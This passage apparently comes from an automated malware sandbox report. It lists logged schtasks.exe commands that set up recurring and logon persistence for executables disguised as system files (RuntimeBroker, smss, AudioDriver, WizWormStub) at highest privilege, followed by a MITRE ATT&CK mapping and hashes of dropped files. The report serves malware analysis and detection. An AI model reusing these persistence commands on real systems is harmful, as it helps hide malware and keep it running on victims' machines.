- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4652
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizWormStub" /tr "C:\ProgramData\WizWormStub.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4000
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AudioDriverA" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\AudioDriver.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2456
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AudioDriver" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\AudioDriver.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AudioDriverA" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\AudioDriver.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Contacts\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2132
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Admin\Contacts\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1348
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Contacts\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4468
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\ChainPortsessionbroker\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\ChainPortsessionbroker\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 13 /tr "'C:\ChainPortsessionbroker\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\CbsTemp\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\CbsTemp\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1260
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\CbsTemp\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3544
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 8 /tr "'C:\Users\Public\AccountPictures\wscript.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4804
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1656
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\Users\Public\AccountPictures\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3132
-
C:\ProgramData\WizWormStub.exeC:\ProgramData\WizWormStub.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
C:\ProgramData\WizWormStub.exeC:\ProgramData\WizWormStub.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2948
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD5e68c730d5e9eea130b20f99f8380e644
SHA1d5387728b7aa9724e5f49d9ebe871c4bcc447c01
SHA25644a30d53788ccbbef510a68b894c40a093ecc4a934b6a7c91037d3180987bf71
SHA5124389361097a762576b0ed8da4ebec4d4189af80decbe0b4e2e7c12a6b2f206107ad0597be557690cac73f0e5875057e48a7338a52403288527329e276cbc6041
-
Filesize
166B
MD5eff3710eb6f094ac204ff6b4d7d7107e
SHA12ec3eebb2037ee862dfd7984101bbec687c7ad7b
SHA2565a27f828660d67faae0e0c7c9d201c543f9e16db4ef1cb5f0883899b86e321d7
SHA51219becb062d3cf759b820fb45170e9aab11e6179475c0090f9306ca2e722f24b74274263fbb4783096ceb10d311dc8f1f3261ef9f44ee0235a70aa0f004cb508c
-
Filesize
224B
MD555733945e00baace8cd6236206f9acf6
SHA161a590cb6acb3e6bfaac1fc5752162fc60647ce5
SHA256d7f4a58ae89de59a45958e9a78eb6d3e83ff45d9843747850fc4f4974f24e3e3
SHA51258ac06c815cc508dc6281cae24a78ac98fce1bd310809f0311a4613adf2f103e92ccd65e073787ef682d9a37adc3ef6fd1c81f7eebdc5f7a0f7b28636caa76c8
-
Filesize
34B
MD5677cc4360477c72cb0ce00406a949c61
SHA1b679e8c3427f6c5fc47c8ac46cd0e56c9424de05
SHA256f1cccb5ae4aa51d293bd3c7d2a1a04cb7847d22c5db8e05ac64e9a6d7455aa0b
SHA5127cfe2cc92f9e659f0a15a295624d611b3363bd01eb5bcf9bc7681ea9b70b0564d192d570d294657c8dc2c93497fa3b4526c975a9bf35d69617c31d9936573c6a
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5ecceac16628651c18879d836acfcb062
SHA1420502b3e5220a01586c59504e94aa1ee11982c9
SHA25658238de09a8817ed9f894ed8e5bf06a897fd08e0b0bd77e508d37b2598edd2a9
SHA512be3c7cb529cafb00f58790a6f8b35c4ff6db9f7f43a507d2218fd80cebc88413e46f71b1bc35b8afcc36b68f9409c946470d1e74a4fe225400eeb6f3f898f5b3
-
Filesize
944B
MD554522d22658e4f8f87ecb947b71b8feb
SHA16a6144bdf9c445099f52211b6122a2ecf72b77e9
SHA256af18fc4864bc2982879aed928c960b6266f372c928f8c9632c5a4eecd64e448a
SHA51255f2c5a455be20dcb4cb93a29e5389e0422237bdd7ac40112fec6f16a36e5e19df50d25d39a6d5acb2d41a96514c7ecd8631ce8e67c4ff04997282f49d947aba
-
Filesize
197B
MD570c3d3c83b00b39940a31de72eff0043
SHA1dcd3fc7d1ad3de33e62101556ec8c6f0e8bf1c6f
SHA256516f8dc2444736a3627b210df72be82e30e01e57341b996598e6034f1a1f6785
SHA5128dea8c1c9107565e18630467c9cae0501766337c7a5a5589f3ab497b4755245d8a95ce9ec01f69f0126fac1c5800850ce168153be4ffe7f669f0378fa95bbed5
-
Filesize
47KB
MD52498d43b33fdf705d23a044d0704271b
SHA179b2ee6e706d561533936cde87a46830fbfeec9b
SHA256d1ba8885bb27b8b53e8754181b474f47d0afc57ce406ca4c18edf111cbb63226
SHA51279b0ff8be1762e31c20ae5b5440958bbe652b11f219a5542d9cd2fa789c90dd5898b14be2245ae03f49c5ada54db0547df5eacc7d143f9c0ea608fb4600b4690
-
Filesize
2.6MB
MD59d479998ab307798514e77b13fa5a38a
SHA12cdd52a5496e45d74a8acce3b19456ef5241130b
SHA256b83e03ed28f61bcfa07e3a06b73d7e0a3b6e8469fe8d8137549cc12ae3911b08
SHA512122bf95d3e56c366db4e1a1af4c2c44d980a54a7a2dca3ef7376587d8e5bcf32d0e06b2bf6465f164763c5f8954302704ead062a9de0729aa4e6e6161051a6f4
-
Filesize
841KB
MD53de8bb77473e360e1b15d2f80f489248
SHA1507f0223797e077f25775908d911dbbdc64e04a9
SHA256be6c566ca9e0f0c620ccbd0581b48ba0cdf616135195dc4f5b9236f985b3172f
SHA5124addcce355f43e392b30b78195372ae8618fdf42f976a6bc88c369708efa3ce2c1222f7f1e20cc49491cc475c970c687445062c51c026d0bf7ecdea3fb26017c
-
Filesize
3.1MB
MD56940c38a8661b0b8713afd4c63b12456
SHA1cc78ac6b4974bb3352890b8e89d038ddc4c4eae4
SHA25642a913fedb31db5ba0cf28abd0fe6afc3b9807aac7045a1c02579c2b3282a3b1
SHA512df2e75e842f22802a43e155c0667147933d17f8902df880d3738d29a5bcaae5ae199c759642bf2414c10a1eca4721966b3d7759e06ddeca5b69c698689e71b05
-
Filesize
81KB
MD5cdff2cee70c00c73f066e1c9a7515a95
SHA1f8bfe41193a917830dc13450c2665d862fea08d1
SHA256f52798a690f661a2b30e2fb3a3689a0aa09fcc0f7ea4efe669e265670742254e
SHA512747a63e7bc184d7fd09f842c176090bc37c88166155b4429faf430760cd8af182c853cc173c62a25ce3c94ccd74b66106b145f80bf5bb151e6b9bb865f23a939
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
150B
MD50a259bc053981a2f4060ffc9a4c4b525
SHA1e5a5702e0f6319657d52ecf66295b0fda48ea3e7
SHA256d2f0841d0ac2e389d35b67df5b35518faae3e7b2a4079c14e5c0c73e1a0d7d7c
SHA512fb87da89c4bc4aed6f9d39457010a00ceda77465be7c4cfb438ba30626c45db877fb68b2eee79f3d2c95197d79c503b7d5b098aaea0c291ea0f8b43d3f7d9eb7
-
Filesize
224B
MD5e469dda91ae810a1f94c96060f3f8a65
SHA10b4b3b0f6f937016b1e045ce5313ee2a65a38630
SHA256d42fee8db8eb0e047ca53ad59b1c9bc69fe04993be36fec502e3532371908842
SHA5122eb4037361c03e195c642a53f55a3182a6df19903db503060e366f2394750e64ae04fdaace61ef5a6dba649defc88322d78edd2928bc53ebd1ce11d68cc88dac
-
Filesize
597B
MD5c2291863df7c2d3038ce3c22fa276506
SHA17b7d2bc07a6c35523807342c747c9b6a19f3184e
SHA25614504199bede3f46129969dbd2b7680f2e5b7fcd73a3e427ce1bb6217a6d13da
SHA51200bf40174a67e3e663d18a887c5b461a1e5ead0b27f0a139d87969158c58f4ca72cfa5a731dda239356192ca4cb5ac6ae2b0e37401d534e686cabacd3cbee8fa
-
Filesize
21KB
MD5e854a4636afc652b320e12e50ba4080e
SHA18a4ac6ecc22ee5f3a8ec846d38b41ff18c641fdc
SHA25694b9c78c6fa2bf61fba20a08ad4563f7dd2f5668c28eff227965ce0a2032d5d5
SHA51230aabd5079b6ed0948eb70fd18e9166096e4ba5d1d47fc35b7270f931d19bbe6cd929b6010f70297bf5272dc5a79e2523721354d211c4080d68ad8d17e316118